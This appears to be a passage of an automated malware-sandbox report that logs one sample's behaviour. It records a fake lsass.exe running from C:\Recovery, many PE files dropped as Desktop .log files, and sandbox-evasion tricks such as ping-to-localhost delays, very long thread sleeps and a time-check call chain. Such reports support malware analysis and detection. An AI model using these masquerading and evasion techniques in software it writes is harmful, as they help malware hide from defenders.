                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\lsass.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeMemory allocated: 1AE40000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\lsass.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1A7B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1B2A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\lsass.exeMemory allocated: 28D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 28D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 2A30000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1AA30000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 7E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1AEE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 9B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 2A00000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 34A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\whSGRYvh.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\CmKYhHkf.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\HInMzsNO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\gtMhCYIK.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\oZQzjlbX.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYkgyfvY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\XVlEhDHN.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDropped PE file which has not been started: C:\Users\user\Desktop\AFUvvHdz.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\EaXPTOzT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\XmyUnkUi.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\LkfFbrxk.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\uhqhlNja.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\dhGiqFYl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\MhHNxrMf.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDropped PE file which has not been started: C:\Users\user\Desktop\PgRkIPoV.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\phNJAZcc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\brdjWOxr.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\JeCeCscc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\qjmAjDHY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\RIKTmlsJ.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\nDKQhfgz.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\YBBlCWWw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\GQmWAABO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\icHKrlAV.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDropped PE file which has not been started: C:\Users\user\Desktop\iAcIGVjp.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\UynSGdTD.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZPkAsstD.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\tIBixNUy.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\MtSmEjDp.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\UKBLugCN.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\kwMHLMmE.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\FrxXNAmm.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\TBLKldEI.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\CKyWUHyH.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\QrHcjUSw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\gVSkXNZP.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\nPayaidT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\gvHJzrMq.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\reDyPeef.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\ryfhxvpx.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\heJamQmd.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\vXhOtgDl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\AsWoiMty.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeDropped PE file which has not been started: C:\Users\user\Desktop\QXsvSdGP.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23731
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\lsass.exe TID: 4476Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Recovery\lsass.exe TID: 6380Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\lsass.exe TID: 4456Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Recovery\lsass.exe TID: 2692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\lsass.exe TID: 3236Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2416Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 5316Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 6696Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 5184Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2004Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 1168Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 5644Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 504Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2920Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 1516Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 3128Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 4284Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
